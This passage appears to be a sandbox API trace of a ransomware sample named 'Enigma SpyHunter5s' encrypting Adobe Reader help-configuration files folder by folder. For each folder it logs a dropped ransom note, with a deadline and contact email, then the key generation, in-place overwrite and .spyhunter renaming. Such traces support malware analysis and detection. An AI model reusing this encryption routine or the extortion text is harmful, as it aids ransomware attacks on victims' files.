files\\java\\java update\\jusched.exe.spyhunter")) returned 1 [0179.742] GetProcessHeap () returned 0x2c0000 [0179.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.742] GetProcessHeap () returned 0x2c0000 [0179.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.743] GetProcessHeap () returned 0x2c0000 [0179.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b460 | out: hHeap=0x2c0000) returned 1 [0179.743] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.744] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.744] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2eb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e414, lpOverlapped=0x0 | out: lpBuffer=0x248e2eb*, lpNumberOfBytesWritten=0x248e414*=0x127, lpOverlapped=0x0) returned 1 [0179.745] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.745] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e414, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e414*=0x2ac, lpOverlapped=0x0) returned 1 [0179.745] CloseHandle (hObject=0xa0) returned 1 [0179.745] GetProcessHeap () returned 0x2c0000 [0179.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76050 | out: hHeap=0x2c0000) returned 1 [0179.745] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3b0 | out: pbBuffer=0x248e3b0) returned 1 [0179.745] GetProcessHeap () returned 0x2c0000 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.745] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3a8*=0x30) returned 1 [0179.745] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.746] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg") returned 79 [0179.746] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.746] GetProcessHeap () returned 0x2c0000 [0179.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0179.747] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e36c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e36c*=0x15d, lpOverlapped=0x0) returned 1 [0179.747] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.747] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x248e36c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e36c*=0x15d, lpOverlapped=0x0) returned 1 [0179.747] GetProcessHeap () returned 0x2c0000 [0179.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0179.748] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.748] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e36c, lpOverlapped=0x0 | out: lpBuffer=0x248e3ac*, lpNumberOfBytesWritten=0x248e36c*=0x4, lpOverlapped=0x0) returned 1 [0179.748] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e36c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e36c*=0x30, lpOverlapped=0x0) returned 1 [0179.748] CloseHandle (hObject=0xa0) returned 1 [0179.748] GetProcessHeap () returned 0x2c0000 [0179.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.748] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.749] GetProcessHeap () returned 0x2c0000 [0179.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.749] GetProcessHeap () returned 0x2c0000 [0179.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.749] GetProcessHeap () returned 0x2c0000 [0179.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75f68 | out: hHeap=0x2c0000) returned 1 [0179.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.750] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.750] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2e3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e40c, lpOverlapped=0x0 | out: lpBuffer=0x248e2e3*, lpNumberOfBytesWritten=0x248e40c*=0x127, lpOverlapped=0x0) returned 1 [0179.751] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.751] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e40c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e40c*=0x2ac, lpOverlapped=0x0) returned 1 [0179.751] CloseHandle (hObject=0xa0) returned 1 [0179.752] GetProcessHeap () returned 0x2c0000 [0179.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75e80 | out: hHeap=0x2c0000) returned 1 [0179.752] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3a8 | out: pbBuffer=0x248e3a8) returned 1 [0179.752] GetProcessHeap () returned 0x2c0000 [0179.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.752] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3a0*=0x30) returned 1 [0179.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.753] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg") returned 79 [0179.753] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.753] GetProcessHeap () returned 0x2c0000 [0179.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0179.753] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e364, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e364*=0x15d, lpOverlapped=0x0) returned 1 [0179.754] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.754] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x248e364, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e364*=0x15d, lpOverlapped=0x0) returned 1 [0179.754] GetProcessHeap () returned 0x2c0000 [0179.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0179.754] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.754] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e364, lpOverlapped=0x0 | out: lpBuffer=0x248e3a4*, lpNumberOfBytesWritten=0x248e364*=0x4, lpOverlapped=0x0) returned 1 [0179.754] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e364, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e364*=0x30, lpOverlapped=0x0) returned 1 [0179.754] CloseHandle (hObject=0xa0) returned 1 [0179.754] GetProcessHeap () returned 0x2c0000 [0179.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.754] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.756] GetProcessHeap () returned 0x2c0000 [0179.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.756] GetProcessHeap () returned 0x2c0000 [0179.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.756] GetProcessHeap () returned 0x2c0000 [0179.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75d98 | out: hHeap=0x2c0000) returned 1 [0179.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.757] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.757] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2db*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e404, lpOverlapped=0x0 | out: lpBuffer=0x248e2db*, lpNumberOfBytesWritten=0x248e404*=0x127, lpOverlapped=0x0) returned 1 [0179.758] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.758] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e404, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e404*=0x2ac, lpOverlapped=0x0) returned 1 [0179.758] CloseHandle (hObject=0xa0) returned 1 [0179.758] GetProcessHeap () returned 0x2c0000 [0179.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75cb0 | out: hHeap=0x2c0000) returned 1 [0179.758] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3a0 | out: pbBuffer=0x248e3a0) returned 1 [0179.759] GetProcessHeap () returned 0x2c0000 [0179.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.759] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e398*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e398*=0x30) returned 1 [0179.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.760] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg") returned 79 [0179.760] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.760] GetProcessHeap () returned 0x2c0000 [0179.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0179.760] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e35c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e35c*=0x15d, lpOverlapped=0x0) returned 1 [0179.760] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.761] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x248e35c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e35c*=0x15d, lpOverlapped=0x0) returned 1 [0179.761] GetProcessHeap () returned 0x2c0000 [0179.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0179.761] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.761] WriteFile (in: hFile=0xa0, lpBuffer=0x248e39c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e35c, lpOverlapped=0x0 | out: lpBuffer=0x248e39c*, lpNumberOfBytesWritten=0x248e35c*=0x4, lpOverlapped=0x0) returned 1 [0179.761] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e35c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e35c*=0x30, lpOverlapped=0x0) returned 1 [0179.761] CloseHandle (hObject=0xa0) returned 1 [0179.761] GetProcessHeap () returned 0x2c0000 [0179.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.761] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.762] GetProcessHeap () returned 0x2c0000 [0179.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.762] GetProcessHeap () returned 0x2c0000 [0179.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.762] GetProcessHeap () returned 0x2c0000 [0179.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75bc8 | out: hHeap=0x2c0000) returned 1 [0179.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.763] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.763] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2d3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e3fc, lpOverlapped=0x0 | out: lpBuffer=0x248e2d3*, lpNumberOfBytesWritten=0x248e3fc*=0x127, lpOverlapped=0x0) returned 1 [0179.764] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.764] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e3fc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e3fc*=0x2ac, lpOverlapped=0x0) returned 1 [0179.764] CloseHandle (hObject=0xa0) returned 1 [0179.765] GetProcessHeap () returned 0x2c0000 [0179.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75ae0 | out: hHeap=0x2c0000) returned 1 [0179.765] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e398 | out: pbBuffer=0x248e398) returned 1 [0179.765] GetProcessHeap () returned 0x2c0000 [0179.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.765] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e390*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e390*=0x30) returned 1 [0179.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.765] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg") returned 79 [0179.766] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.766] GetProcessHeap () returned 0x2c0000 [0179.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0179.766] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e354, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e354*=0x15d, lpOverlapped=0x0) returned 1 [0179.766] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.766] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x248e354, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e354*=0x15d, lpOverlapped=0x0) returned 1 [0179.767] GetProcessHeap () returned 0x2c0000 [0179.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0179.767] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.767] WriteFile (in: hFile=0xa0, lpBuffer=0x248e394*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e354, lpOverlapped=0x0 | out: lpBuffer=0x248e394*, lpNumberOfBytesWritten=0x248e354*=0x4, lpOverlapped=0x0) returned 